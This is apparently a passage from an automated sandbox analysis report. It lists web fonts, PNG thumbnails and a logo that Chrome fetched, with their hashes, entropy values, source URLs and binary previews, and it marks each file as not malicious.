                                                                                                                                                                                                                                        Preview:wOF2.......$......b...................................b..4.`?STAT....P.....d..o.....6.$.... ..N..g..[ ...7..<Hm.f.. ..}=p..!v....m..... ....t.1.R@..\S..kq...xN.%................6.y.g......H8...Z....BH......J.2.R.V.v'l..q+.TI).e.lFmA(..$...-..t.sZ02P.LJP.~)+.z.F....L.M@...fC..|'..i..!(6.....d.2n.Q..YR.9.....#wQ..2.][.,i......\.<I..s.o.Q[....Z.....|.....*.../....=...R.[.1..X...L.Gj.Q..........'IBS....;.%u..T;.gh.y..d..2...7....yV.8..}Sty).\^........IX......p. .=.ze...F.8x..bC..h.Yg4...%......h.|..{`p.....~vx..!..p.v.....t.tB->j.Br.?.Y.. O.s...X....s0.g...].=.Ru.".rR....z......\Z.N.y_...P...h.CMj*!.z~y...?..i}...S..ft}u..N...x......0.l....Fz8U._..;42..bs.....+.zG]..[.Ot....wE..\..,v....GK..$}...sT..Eh...?U;."..f....x.:.i..NC1..._...P.|X.2.%.,....{3.51..*J9.W..}.z..RL.(t.P..2........M._.....+..u.X....(e.v&aI.v......J}....$..O..U..:4I}.h.S`0.....ZY...q.g|)X...!....VM.K.#..K.!...B+!..D...6@^.Q...E..6z....X.`..D;""....D...$..q...{.y......ui^-...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 58012, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):58012
                                                                                                                                                                                                                                        Entropy (8bit):7.997002014875398
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:v/rygnjckWB1Xbc33Q1k8BHGEUrn/ydR5V1H27zpYkf0N+:3uUjckQOnQ28xGpKddo/SksN+
                                                                                                                                                                                                                                        MD5:E88455150169496390368F9DCFC709C6
                                                                                                                                                                                                                                        SHA1:672607F20C14829A1071441C031A8411196CFEA8
                                                                                                                                                                                                                                        SHA-256:133BB5C5AF6B43D96660FF65F46464F2A03F7D0DEEB8E2A1F8E0AA7CE6770120
                                                                                                                                                                                                                                        SHA-512:D9FCD7B9C17DFC2DC256E9537FBD0F653C706FD063859602FFD0229768FA1AF6A5B1D723F7A91AD1EEDD0021C21AEE0FBF894933E352ECF3F4D7B0EF655A273F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/merriweather/v30/u-4l0qyriQwlOrhSvowK_l5-eR71Wsf6.woff2
                                                                                                                                                                                                                                        Preview:wOF2............. P...6..........................b..X..T.`..(.....m.....l..N.....6.$..p. .....p..1[.....;..z.o?@\V.7.O....).i...m...`<M].4.....I2.....m{...P.4.....Na"........6..Y.4..;C. ....<.!8..}R...i.2..UR%UR%S..uc..b.1....U2.=....F...w.....y..%.....t?@..8\..Y.....F+`..H7...%N.().J2...(..5..w[z..0..C..W.....:..V.v...k..M...%......}.>..._.{....^T.h..|..#.Z.......?d.m....J..+N.<=..........@......_&k.O.....P.FE...aDN.02.n.3j..#.U.....W.:......>..$......d..s..~.~w{.I%j.%1r....0..Q.k.../.{.......~...w,~........1.S..$.$..T..T@..Q.~...O....!.YB!..h..L..........9......)>.X....PMm....p...i.;....tP..&.O..v....61?..y...sfI:.$`.A.(....._.....]....{.;o-.H$....d.......:M$....m6.a.K%......}h..XND..t...s.O..."F.$.-.....Vf...d.:...R..t..(.<..{.{..J..O.X.7<.taU|.~.=..1.8..+&.w......4L$...B.f6'.k^..6....N\.F.4.2...$..U~......1. .m..EBr...D...>y...1... .t.'..jX..\j).2...n...i.....\M....X.j..0.u..`..@......g......._$.*l...B..[W...#.....R.....?...J..H.?......g.Y
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 1360, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):1360
                                                                                                                                                                                                                                        Entropy (8bit):7.749168790064011
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:yUaKOlSf0ba+BV1iyDz2R+Z5d94VAHTTdjeIx1P0iN0nYr+MN:3aKOlSfwVZ2R+/r4K14cN
                                                                                                                                                                                                                                        MD5:248816E2428823AA2BA6B223B82EC73B
                                                                                                                                                                                                                                        SHA1:EC8DD868A619356C0E30606ECA110A239CA0D83D
                                                                                                                                                                                                                                        SHA-256:4524691B7547D0D9F1A34FF172D940BEDAFD7725A14A5BD1121807B7D993BFFA
                                                                                                                                                                                                                                        SHA-512:DC940B38C218C34AC32B45144B07CADEE60E1AAE7C90F0E657CABD24C09DEC0E43E9B450F9DE107E5A78C2321F115752F8A741362E37FE7099DBA2830BB2E002
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/oswald/v53/TK3_WkUHHAIjg75cFRf3bXL8LICs1_FvsUBiZQ.woff2
                                                                                                                                                                                                                                        Preview:wOF2.......P.....................................0..j.(.`?STAT..t......z....6.$... ..D.S.....(.....(.F5Fe.....bS.!.}.^.|...w...........d....(.Tj~^.z..........]4..NR%....>....9Ym...QF..q`\&E...#.9......v....5..X.."...d...H..h...6.GR...h@....F......$"...d...+.....H....@.@`.a.B..u.x.J....j...........uD.`$hL.JXp.......0. .lt. ._.;../L.;.6..*4.X....1h,j:1fr...f...r.,P.8...Vd......+nY...4.17....j.`..P.. .. .. .....M.(.....h9.......... T...P......7$..$...k...F...*..Hs....|..@..%H*@, ....^)...q..`.8m./.........98f...M.c:.7S...c...`.w...B....>.&.c.V..{.!...c...x...82`.t.Z......3....y., .".s...Wj{...[.n....<d...cc(ob.I.YB........E.{t{........8X.....1....m=.c.z.`!.+.f....e..>5..Ha.9..<.I.........-.`.{..#c..ur.......r..[.z...TM.}......&'..'...o.{.....=.JY..l.u.lO..BcG[K..}.......c.....w..S.G..pG....j.Vr....$...".M..0..U|.hVX.+S.{..oV.g...m.m......Q.kKF_.......he[O.l..g...".......$....=_..@...}.S.....-..!...o.....j...OK...`?..'..p.._.H....B.B.<7..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96472
                                                                                                                                                                                                                                        Entropy (8bit):7.994641085316638
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:hjnFSSJ0UZNEYOHH0BCaQsxaQkBoUC1cQsOiI9LMO2BjPuotRtuXYip4I0eYK:hLM5+OHAxwlObtiId+Luk0oiyQYK
                                                                                                                                                                                                                                        MD5:C3C81A0C22638EC78A34B49C657FAD7A
                                                                                                                                                                                                                                        SHA1:4C154797AF266CDC1D82E8E59FC7A73BD9CC08F6
                                                                                                                                                                                                                                        SHA-256:E86C3985E0F3477EE7DE8CCD24961C96D5C84DDC7A3A130D9BBF2A0592E9E5F6
                                                                                                                                                                                                                                        SHA-512:B3E06A1F46094C8947D408EF5D3A6C259D784896DFC1CCB0529305877DC88AFF86CBD59CA473B87206095E09D01CDCF369D91FBE584741D0C8849396B7B0C98A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..x.IDATx......... ...9>!.)..).......`+,.a..g..fK...If...o.m.m.m.m....A..m.w?>.*g.S]]]....E..?....`M.....N*N...K$...$IZ.VCH!..]m....z.[{.U.......:....e.........j4.UUq..s.1n,....P.F..n&5..'.B...v:.!....(E....r.i...q.....k.*IX..g\r......6`..uY.0.....Q..........^}.G.*...k-.)._{.....!...6RE......X%././....{\.H.M....JU.J..(.`@.........o....\X.s......Lp.i6r.m...L..$.w.9.g......:Ui......6.i........D).....>v...'N..*@...gB2...k...6;.U.b!...c o..k...I.i...n..K|(...P7MS.x.4c.?.4......aW3S.|r.s...R.BP......(C.p.j~5..Kl2U..9}.!........4........A.&Db....P&.L.w.R.='.}_....9o.sY..Y.e .....{Fs.~...G.t..I....@........^"Q.@..`..).t.:.1Yj.M..[..1......<o.....k...........2.s&.). ..u:.lJ.p..?...4.P.;..e.)....v..L!......~.%\.E.].......M!.`4...l.a9.sF..W.2.F.E..GSNh.......>.m...s. .2...s/...G..<..Pw.qC.qQ.E.i7.M.RO....'.:........9..NQ..v..........|...<...."......m..2._.D..Z!u...Z4..Q....!....o4.N.3D.c:@....~..*GQ-...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):11436
                                                                                                                                                                                                                                        Entropy (8bit):7.883659309949095
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:xaSeSbFYluVySi0KTtiw6fYqfCRtB4+kyM3/5+jcmK9ZHvMDLMP3jKdg0KZHiAQi:xaSBbFYqeH78CF4Si5+ovZwgUvsiAQwp
                                                                                                                                                                                                                                        MD5:6AE698E9FB72F3014D183C64E9AAC871
                                                                                                                                                                                                                                        SHA1:06FEC1A4FAB5CC6C35CA3D2B43B4616CEFBA3A70
                                                                                                                                                                                                                                        SHA-256:9969682C52B0A85BBA70AFA77576F48061EE7B4E5E3F9F82BC45EAA113EDB7C5
                                                                                                                                                                                                                                        SHA-512:3F2DEA8D80555D7C7158686C77297073989A8AEF17BF7965F38FB503E10FFB7C57B467296C4281EF83D2AC9A7E0A13F007375B795BA9A233FC21E1FDBE7F1818
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(..,sIDATx.........._5. 4G..Mp....@......0,......`X...`X.a....a...`X......a...`X...`X.a....a...`X......a...`X......a...`X...`X.a....a.....f..[..q....VUU..V[[-.J....D....D ........ ...Y........pg.\.a.....`...c...T.s.S.7.........|.<.].<K.'....X.m......;y..a.P....}..c3`....Z..$.../b..G.N...<J..\o}....c3`.k...nnn..G..q..-..%z.0..c3`.q.K..I!4...\^}$...........u".TW.k}r.,.,y!y.......T.l...............@."K>..".}"jUVVZXX|~T\\.......Qk``.Guvv....-. .....Xl(.'........H$.....`...r........h.....B#"..O...q.B9.....???.Vff&....666......M^QAA.ySJ....K.......JJJz....E:.......drr......C&..........%..q....omm......JKK....Joo...fYY.~'r...K.....255.]C...>>>..Z]].s..............v......;....U....!dww..........,.,.,.&00...faa.5`!.===766Z[[.8==]]]........0xFdjZZZMM.......%............Q<off.'..%$$..0`..XhZyyy.....y{{....z....x.I255.K+((H.................].>$$..g.b...X...&&&...........3`...........b.....Z|...n]..YK.........A."......t.4D.cbll..a.,......
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):71956
                                                                                                                                                                                                                                        Entropy (8bit):7.989217533805544
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:HVsk7qR4g4Q8WZ/3FY3G1jIKxmyPoQjN+F2aAibFVv50g6:1sR4WvY3G1j9XdjQJVFJg
                                                                                                                                                                                                                                        MD5:DECB2F52FD4BE6C3D27BBF394666E7C6
                                                                                                                                                                                                                                        SHA1:37AD1AEEDFEEE31808AEF1BFEAE1C0D19FB7F719
                                                                                                                                                                                                                                        SHA-256:0917337FED065EB359DFC5329B6DD16A13CF737DE09F4EA93831A82A848A4A2F
                                                                                                                                                                                                                                        SHA-512:C92B6C200E3F94255B9DC0C2FFCCC7B22D2724E132F77B39309FDC9BDE5C8631E07C44EF848650FA953DB9304C062D24F483D74575F583C5F1A9BF61ECB31958
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://ssl.gstatic.com/docs/templates/thumbnails/1vBhp2Lnh94Jpih-KMlO3SXlEIdgPxOzZiB2o3hRI58U_400.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(....IDATx......... ...9>!.)..).......`+,.a...V.%.q..z`.@'2.%.-.~3.9133..91333c..$.d.3.-.LW.....[..6.._>......t.VU......("B..JD...'..&@.E.7........UA...#bN.H........LNO.o.i...'.P...5@..V.C4.,cN=...:..Y..J........v;N.X....@q\z...w.*.E1iui.+@.....\f..&,.(..1...ZN..I5.jj..=...Eh/.Q..\...QD..eM-.y.1._.W... .q..8.r&.....Y.......@.U.d......3q.......j.Ggye0I....#.....,`N...E2...N...0f..q.\}.....]...G..........7>..N7^rq.g.y..=b.0Ab...A./.?aX.......U!....XU@.AP......D..i./..(*4...Vc.j...y........#X.}2..`..#6.i.(U.y..Ed.AD(.......X..%.....3..7..s`if.&.^...L.].r.N_D./.s..F..z.u%..-\....'J.....F.0. ...W<[..Ia..$..*.3UX....?j./..#2.MZ;....%...$..]@8...n..)S...E..}.bK].$....8.EP..z........[\...6.]...E......8E......*....AR.^...o.;...8..#..._...%V...f..W.........^....... %0..|..w...'n.......{|.[.!.eI..(0.....U.x......6..*..%....&...(.|PT..o...j`..|../..wnBI.j,x.1.a5.)U.:<z7....}.4..S..TV../.....h....#.'..1oL..4......kc.-.([..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 31456, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):31456
                                                                                                                                                                                                                                        Entropy (8bit):7.993355498241683
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:5bx84QeXTL1ovgoUiK31+lssZfEHQ6EXEjJkEbyt5r:84QITL1onl8OsOfSJEXEjmx
                                                                                                                                                                                                                                        MD5:8787E52101C989DEA9FEA21E232FA45B
                                                                                                                                                                                                                                        SHA1:F112710595BAA904A62B68C2066DD34D7103E1E8
                                                                                                                                                                                                                                        SHA-256:D5C4965A6E9C89DEE7D1389167C821976BFBF55D80E7DCDDFBCB5400B1AE01C9
                                                                                                                                                                                                                                        SHA-512:CFCB461162FEED6F093440F8569689B5BA34A0BEDCB10A12A5AF2E470A7071EF0A587331AA920828F8E78792D8E5BF43663540887C247D7F1AB8A14CAA18E2E3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/oswald/v53/TK3_WkUHHAIjg75cFRf3bXL8LICs1_FvgUQ.woff2
                                                                                                                                                                                                                                        Preview:wOF2......z.......R...z{..........................F......6.`?STAT...X.....(.....H..6.$.... ..D../..[.+...c........Yo..w..t.x/....A*;4.....`#eM.....v..c.w....V..).RD..ZK7NU..r^..bji..uke.Fk.p......LB..8.....d.OB...........[.$$!.u..f.......6.&0......r.B.u.-..q.../X...7...`?8..$.....#=Iv.+......L.]la.>.s...5@..p..g.....tk.......V....z..BG..`.8..~..........p.......B....}lp....d.z-....}w..\...$........)..u.&.U.*.U..........}.{$..d......'.Jg...B.....EpQI...'.....?.C.<Q'.DI^8U? .).*.......-^....Vi.%. <..k.) G..w.Eq]\...W..J...a.b....,.Z......p..B.Fm...F<~vN.K.Aw.?...s.}6dC.t.`..l.~l..."..-m...nY....i....i...$...[...g..*....@....],?.s.w.._.HE...L.A.6.6f.....F...U.....h...?x......8.....:3...{.SYIBW.].a%..P<;.Tu.~L..4k.dkM....p..J......*.v; ...a.ics.?...,~Bmn...te..?....O|.2..#^.......8*....\3.O......&...B......\f......U6.W.=.-.7...?....3...5....#...QU...W?.d.8V:n..\..tl...0.w.t[....<].FQdKR..\.).....%$qj.o....%..# Y)..cK....\...w.........(..}"@J
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 42132, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):42132
                                                                                                                                                                                                                                        Entropy (8bit):7.995169768536831
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:768:mZTig+Kv+tyCkYAb9D1BDH1xIE12gWo4kXJ6xUCjOtEsllZ5ql3/a0YM3jUVgQwE:6ToKWwC9AnxH1+E12gbExUr0PdzLcQUn
                                                                                                                                                                                                                                        MD5:2661BDA6D2BA62A920BE11952BB94849
                                                                                                                                                                                                                                        SHA1:7C1EE90488041D444D2289AE42C06D1958F34584
                                                                                                                                                                                                                                        SHA-256:ADD6DDD7FEE32D58EBA385983AB7DCC9657AD97CDBD4BF4594DB38675847EDB4
                                                                                                                                                                                                                                        SHA-512:D89115D310603052FF8E9C10F23322F64C74A6E4588F719E37A9368969122752357BB1BD3F45136D34AABE6DCEE717B462684A2D861931635B63AA876AED0719
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/nunito/v26/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshRTY.woff2
                                                                                                                                                                                                                                        Preview:wOF2..................0..........................$...r..4.`?STATH..*........Q..6..6.$..^. ........[...E.2v_.0.%.......-g..`.)..Wz.0.p.;.L7w".C...}........H&2f...i.B.(.s8....\.M..\..)kW.......z].L\.-....."q..pvGW.F..+0e..fv....5....H1Yu..&..U.]...fiQ.....'..3.-..X......PT....,K.5.....^.W..LB...d0...d0.Jv.%.........7.$....,QQ....".d....N.x.Z.?g..Z.LI....Q.{..D..j..M..L..<..1..CK.......4.......8....s..y?..=..D...\.M...?.U...N.7..._..dR)..VS%K./...G.M.?..[.B.s.o....I<%..hp....JD.+.z.....g..."...UX....T.J.q.B...y~n..}c...#R...B..|,.(.`R..." .G@l...a....)..{...H...........$.:*...g...(R.w......|.}6.<.M..J....5c36uN].K...E..r.c.{;n.7k.&b.._..O.i....A.Iv.N..: ]I{.t.B.....s.tz..wYgo..eJ.ej..?.....bd.%..."...C........bc...,b.BZ'........U..........B.....#.m.....c.6JJ..Q%0Z..Zh.D.60..0....N....;,..<.....g)......9.M.RE.......ET.:..\..E....o2..4.....8...&....w..w~(*...a.#.T....l........(W..f...6r..P..."......*@....@....3..Sq8.J..(....u:...%3.?T<....M\
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 150 x 54, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):3170
                                                                                                                                                                                                                                        Entropy (8bit):7.934630496764965
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:c2ZEPhMXQnPkVrTEnGD9c4vnrmBYBaSfS18:c2/XQnPGroGD9vvnXVaq
                                                                                                                                                                                                                                        MD5:9D73B3AA30BCE9D8F166DE5178AE4338
                                                                                                                                                                                                                                        SHA1:D0CBC46850D8ED54625A3B2B01A2C31F37977E75
                                                                                                                                                                                                                                        SHA-256:DBEF5E5530003B7233E944856C23D1437902A2D3568CDFD2BEAF2166E9CA9139
                                                                                                                                                                                                                                        SHA-512:8E55D1677CDBFE9DB6700840041C815329A57DF69E303ADC1F994757C64100FE4A3A17E86EF4613F4243E29014517234DEBFBCEE58DAB9FC56C81DD147FDC058
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.......6.....%.`....)IDATx..].pT..>.l......b..(Hv7 D7.n.8....V..H_.R;S.hY`w.(..*.N_R."0`.-.A..|.*N..`....n..{.&..l.o..;.....a....d..$.................J.1.*.....7+.c...o..T/.~V.r.....D..G.Ic.....E_.FUR.&..U%...X.4!!Q.H";......e(Ic...$..."1..jR[.L..../Ek.}AH...W.L.V....Y..S..q...!._r.D....G,%...Hu.$q..\.j.x...G.....]....B.i.I.+B.....Hu.....Q...K;...J.q..._......_.x....A:......j....:c...^.....k=GIj..Y]B.V..m...Y.\....$..!....+.R%..U/;p.....R4.g.R...XH.3%..JHHby.eqOZdnS..$.. ....dn...$.w....E.o.8...b@.z.)5.L4|.F...9......pP.8.|....-.M..:..ux...7.]...'..(q..~.....KQ.W..,b..L<.Y.].V+....t4.$.V.O.....D.5..v.j...Hd.M....z.......V..q.p.......;:.J.%2.G.;./.E...!.H. ..../Dk.8.T....+..%Vs4..DC.R.`..Z..........0.[)N!.....%.>&.b.$.M....P.!...!....'Kv..Nd...mvR.:.L....w..y%.i..H..u....s.Se1.[.)."..)%.I.....(.#M..4.@....#.....X..P<...k..g....O..I..>-...'._.Q..T.y.=Z.GR{]..&t}*......>J..!,..X6.HC..$.:.}..z...._b.b.4.E.....;.Ha.?s.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 4196, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):4196
                                                                                                                                                                                                                                        Entropy (8bit):7.947790388565488
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:XXIQbG13ziwYaI2QRncIaKuia6GpnQtzFLt4Lh2uSKafK:XXl0DVtIPuiYCKaC
                                                                                                                                                                                                                                        MD5:92CFF5BF3D47970DEFEF49EBF56448DB
                                                                                                                                                                                                                                        SHA1:163E2B870500AC648A075A008408C9FA73922953
                                                                                                                                                                                                                                        SHA-256:AFD7B4CE1230FC5D6CB58DAEBEED6BCD09EBEE1E4414367596BC3BB33F62444C
                                                                                                                                                                                                                                        SHA-512:49627E12E0B3DA7B6C5F616D3DFF3AFA24F2F7C247B46A34E6A99F0476863F071797CF265AAB2C5758CA265FFEC7E5846AE80715350795EEB40615124D2335B2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/amaticsc/v26/TUZyzwprpvBS1izr_vOEDOSf.woff2
                                                                                                                                                                                                                                        Preview:wOF2.......d...........................................T.`.....$..m....X.e. ..6.$.<. ..x.W..<...3.5]O.../..!.m`_..5~.X...;c...S.#T,.5V...*...`u......t..#$........A...2.p..l.{b+H........p.....@....3@..%....k..[....(....l..]cv.-...m..(....=....1..=A....5E....|..v?D...Xa...w@..J&.%k..)z.Q..8..4W..f.2H$W.h+t....$9..=..q.-; ..P.qJ..$.Ua+L..0.....'..u71..Bg.F..U. C".....!M...)V........M._s..mW.w..X.c.A....`n.....{.@..-J....B}...q.o.0..>.Q....|.z....BBh......sIX.$av_5...J<./..;........|h.......2.#..0F...4..b...}E..d..\......1..N]........`.0B.....?A.9...F....+I.BX.....(W....1.t.C....[.t...jo{..< H....F.+@..@.v......D.L.oD....Yr.("/M._..I...m....^...`....W.OZ.O..0.p!tQ..?.......a.1-e...Z....k.zb....j;!.&........m.-......;..,....`....3...?.!wT.{.R(.y...>.i.>..o......+.db..:b.....vj..)..\...2.&.nk.q.W..F..tM...._c)......@:.Z^..;...O..6".P.V..}x.*.4..b/....[.S......~4..c.^..m.....2..p..lB.K..O....>..K......C.m....M.H.Y..a1..:.0.Ki..7..(\.f*.3
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 400 x 520, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):112258
                                                                                                                                                                                                                                        Entropy (8bit):7.99398255557757
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:3072:/HRhPE01k0knip16ZFTT2xVLELtALzVePpH:ZhPB1kBkAbTUxutA8pH
                                                                                                                                                                                                                                        MD5:4A732F4AEB8CEE4682ACDA194340D0A3
                                                                                                                                                                                                                                        SHA1:609EA787422F0131C7EFF264406F55D21A02D9B9
                                                                                                                                                                                                                                        SHA-256:7ADC9DAD55CB1A388B920655E69FFA6DE458ED2DFCF8BBBDEB1A83B27186B526
                                                                                                                                                                                                                                        SHA-512:8F7387603EB8C4BFFA72C80DAB7944F1173EDA3BE20999041C68DCFF7A4A1E115C26B085E220B04EEBC4D5C434D31DB002D74909E4BC34BB0E4AC44D8CB6A097
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............../(...IIDATx......... ...9>!.)..).......`+,.a..'V.%7.l%Y..{.{.!.<ffffffffff.y..2.3..04.%._.N|r..W.8.....<..g6..J)EA...7..-...B(#TF.D."xW...!(..)#..H.....O!.!,..1....h...<..Ad...t.....SK...G./.o5........Ox..O......a.un......~.._>33.<lav....:w......6{...33..0.2...{.]....Sf.....uR8.t\.......XXX......={..*4...J.csG.u......E...w..{R.......O..jDE.\..9+s..!.V6..w.W....{...........@&.:...n.).IoU........H.d.}..F..);.].~.k...=..T.....Q(......q..s'.j....l.............eYv...%M+.....Q...V7o../.K.Wj....K..l.o`-....B][Y....~.....;>.U..<b..1..q..s.@..|..^...cm#.]J......lo5..A6.b..R.a....4(...o...PF.x.K.I.g...2j....+...M......=L..t....L.)....J...\.+....%.].P..isL..3z{{:K.|>.N}....X.i5]'..J...D....9e....p%.>....e.hh....u...|*T..:..$...Q@.FR2....~.....R...HI.z.. @\..m;%DH.i..."..F-?ln.c..).WL.......T.6*!.x..,..T.a"Xn......?0......./.w/......R..R,..K..Eq.*.J...cD"..@.`.e..a('.....5....R....0........:o..../.11.]..[\<4.T..=e.l...[o..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 64068, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):64068
                                                                                                                                                                                                                                        Entropy (8bit):7.995942836449749
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:1536:upRrvXnQdfmI5RP21QVVEIeKN8UhJhfEvCHal5j091ScR9b0XnK:u/rIdDkiVl8gfol5gnStnK
                                                                                                                                                                                                                                        MD5:EFD94F0EB81E50A5F75CFAC73257EFC2
                                                                                                                                                                                                                                        SHA1:E8C4E0A66E8BA85DE2BDACA59CBCC55CED60BBCA
                                                                                                                                                                                                                                        SHA-256:3A6C1001C36D7F2F8AD4DF369BAF38217AF3ADAAE94A5625651C05F4C3A38BD3
                                                                                                                                                                                                                                        SHA-512:215837C93B5FF3247D5912CEC24216CFF64C16DC6B07F620424E9DB101DC6FDDC792B546F42744D74FF08785D6CA2143A6D45F5C1D4B84E357DAB942456BA42D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/amaticsc/v26/TUZyzwprpvBS1izr_vO0CA.woff2
                                                                                                                                                                                                                                        Preview:wOF2.......D......(@..............................>..l....`..d..$..m.....h..&.....6.$..X. ..x.....<[..q..].)..].....'0}@..2%~.s..<mE.*..n..,U.......d2........XV...Q..Hexa.f.lE.&...c1....T..4...e..Uj....{..qL2.p........ZG..(.Y*Kz.-......M.=.5q.3.f..C_ ..Q..Y.F.p6..E..T..$...H..I3..g'/M..OE../.n..M/=.f.......G.r.h.......i)k....I.c...Y.`.{.O[WCe.]Um.F&Z.u`"..........S.W....Y..}"..i..T.....gl.......H.m..b..Jru.KH.*...$.PI.J.....+..q.$.p.m..ZY.U.g.@4..:VAV.N.ed.....\...~..s..........h.h.....d..A.....~..Q..O...v.;....l....,..KJHI.J..E.b`4.).}g.y....mz......!:GBu.).....>.`.....>W...Ad.,@.!.D............T.S.!..jf....N......WnU....X.9..t.....F..JNz0....x=..2.u.....!.....=....}.M.DY....b_R..W.*<..?.l.!.[.m.6.T.X..B;h..^.B).u./g...].....$.l7....G,.ff.J..L........%..?..6a..G.........$......X.U.e.>....v3.m&Y...nX> .V0p.I^.Jw\.b[...=3..P..<...Av.k.......Ia.....x......Ja......jSH.......P.6>Qi.*..m..b%N+F.......O..{.s.O...XqR.j......P...)/i/..&.R..i6.......iw.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):2793720
                                                                                                                                                                                                                                        Entropy (8bit):5.050386489944291
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:BmTvFc1Fij6qVuOCRI++iFJRDe+JAP9+iw/esGkbvtiQX:ps+JAMR
                                                                                                                                                                                                                                        MD5:3C19E67EAA24029BD4EED92C10F9CACF
                                                                                                                                                                                                                                        SHA1:960A0BE07720F41E2DCD47D9849E26B45DF693EA
                                                                                                                                                                                                                                        SHA-256:1BDF9D941667CCAC8533B16C3F3D6F40D03F05AC020A4C80B80B82AD14AAC86B
